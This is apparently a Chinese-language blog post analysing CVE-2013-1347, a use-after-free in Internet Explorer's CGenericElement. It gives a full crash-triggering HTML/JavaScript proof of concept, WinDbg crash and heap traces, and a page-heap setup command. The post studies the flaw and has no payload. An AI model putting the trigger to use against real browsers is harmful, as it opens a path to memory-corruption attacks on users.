CVE-2013-1347-Microsoft IE CGenericElement 释放重引用漏洞

好久没分析漏洞了,《漏洞战争》这本书也停滞了很久了,最近没给自己什么任务,那就分析分析吧,虽然这个看着比较长,看看能不能简便一点。

“水坑”攻击事件

就是黑客入侵了一个目标人群经常访问的网站,并植入攻击代码,成功借刀杀人哈哈

漏洞分析

环境

win7 sp1 32位
windbg
ida

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!doctype html> <!-- required -->
<HTML>
<head>
</head>
<body>
<ttttt:whatever id="myanim"/><!-- required format -->
<script>
f0=document.createElement('span');
document.body.appendChild(f0);

f1=document.createElement('span');
document.body.appendChild(f1);

f2=document.createElement('span');
document.body.appendChild(f2);

document.body.contentEditable="true";
f2.appendChild(document.createElement('datalist')); //has to be a data list
f1.appendChild(document.createElement('table')); //has to be a table

try{
f0.offsetParent=null; //required
}catch(e){ }

f2.innerHTML=""; //required
f0.appendChild(document.createElement('hr')); //required
f1.innerHTML=""; //required
CollectGarbage();
</script>
</body>
</html>

ie打开poc,windbg附加,允许阻止的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
0:013> g
ModLoad: 69b60000 69c12000 C:\Windows\System32\jscript.dll
(e34.660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=659d017a ebx=004bec08 ecx=0049c2e0 edx=00000000 esi=0268e8f0 edi=00000000
eip=00000000 esp=0268e8c0 ebp=0268e8dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00000000 ?? ???
0:005> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0268e8bc 65b8c407 65bb5961 0268ec0c 004bec08 0x0
0268e8c0 65bb5961 0268ec0c 004bec08 00000000 mshtml!CElement::Doc+0x7 (FPO: [0,0,0])
0268e8dc 65bb586d 004bec08 0268ec0c 004bec08 mshtml!CTreeNode::ComputeFormats+0xba
0268eb88 65bba12d 004bec08 004bec08 0268eba8 mshtml!CTreeNode::ComputeFormatsHelper+0x44
0268eb98 65bba0ed 004bec08 004bec08 0268ebb8 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
0268eba8 65bba0d4 004bec08 004bec08 0268ebc4 mshtml!CTreeNode::GetFancyFormatHelper+0xf
0268ebb8 65a3b9c4 004bec08 0268ebd4 65a3ba2c mshtml!CTreeNode::GetFancyFormat+0x35
0268ebc4 65a3ba2c 00000000 004bec08 0268ebe4 mshtml!ISpanQualifier::GetFancyFormat+0x5a
0268ebd4 65aac009 00000000 0044e908 0268ec1c mshtml!SLayoutRun::HasInlineMbp+0x10
0268ebe4 65abb4e5 00000000 00000000 0044e908 mshtml!SRunPointer::HasInlineMbp+0x56

eip变成了0x00000000,从栈中也看不出什么

开启页堆

1
gflags.exe /i iexplore.exe +hpa

这时候是mov出的错

1
2
3
4
5
6
7
8
9
10
0:013> g
ModLoad: 6a640000 6a6f2000 C:\Windows\System32\jscript.dll
(d5c.a94): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=669b5100 ebx=079d2fb0 ecx=082d1fc8 edx=00000000 esi=045eee50 edi=00000000
eip=6663c400 esp=045eee24 ebp=045eee3c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc:
6663c400 8b01 mov eax,dword ptr [ecx] ds:0023:082d1fc8=????????

我们看看这个地址的属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
0:005> !heap -p -a ecx
address 082d1fc8 found in
_DPH_HEAP_ROOT @ 151000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
8360b60: 82d1000 2000
6c3a90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77465674 ntdll!RtlDebugFreeHeap+0x0000002f
77427aca ntdll!RtlpFreeHeap+0x0000005d
773f2d68 ntdll!RtlFreeHeap+0x00000142
7753f1ac kernel32!HeapFree+0x00000014
664cb9a8 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
66647dd0 mshtml!CBase::SubRelease+0x00000022
6663c482 mshtml!CElement::PrivateRelease+0x0000002a
6663b034 mshtml!PlainRelease+0x00000025
6669669d mshtml!PlainTrackerRelease+0x00000014
6a64a6f1 jscript!VAR::Clear+0x0000005f
6a666d66 jscript!GcContext::Reclaim+0x000000b6
6a664309 jscript!GcContext::CollectCore+0x00000123
6a6c8572 jscript!JsCollectGarbage+0x0000001d
6a6574ac jscript!NameTbl::InvokeInternal+0x00000141
6a654ea4 jscript!VAR::InvokeByDispID+0x0000017f
6a65e3e7 jscript!CScriptRuntime::Run+0x00002b80
6a655c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6a655bfb jscript!ScrFncObj::Call+0x0000008d
6a655e11 jscript!CSession::Execute+0x0000015f
6a65612a jscript!COleScript::ExecutePendingScripts+0x000001bd
6a65c2d9 jscript!COleScript::ParseScriptTextCore+0x000002a4
6a65c0f1 jscript!COleScript::ParseScriptText+0x00000030
665f68c7 mshtml!CScriptCollection::ParseScriptText+0x00000218
665f66bf mshtml!CScriptElement::CommitCode+0x000003ae
665f6c35 mshtml!CScriptElement::Execute+0x000000c6
665d82b5 mshtml!CHtmParse::Execute+0x0000004a
665b77cf mshtml!CHtmPost::Broadcast+0x0000000f
665b7f36 mshtml!CHtmPost::Exec+0x000005f7
665b8a99 mshtml!CHtmPost::Run+0x00000015
665b89fd mshtml!PostManExecute+0x000001fb
665b7c66 mshtml!PostManResume+0x000000f7

我们可以看到in free-ed allocation,这是已经free掉了的,明显的uaf

我们再看看,可以看到mshtml!CGenericElement::vector deleting destructor' ,确实是这个对象的释放后重用

自愿打赏专区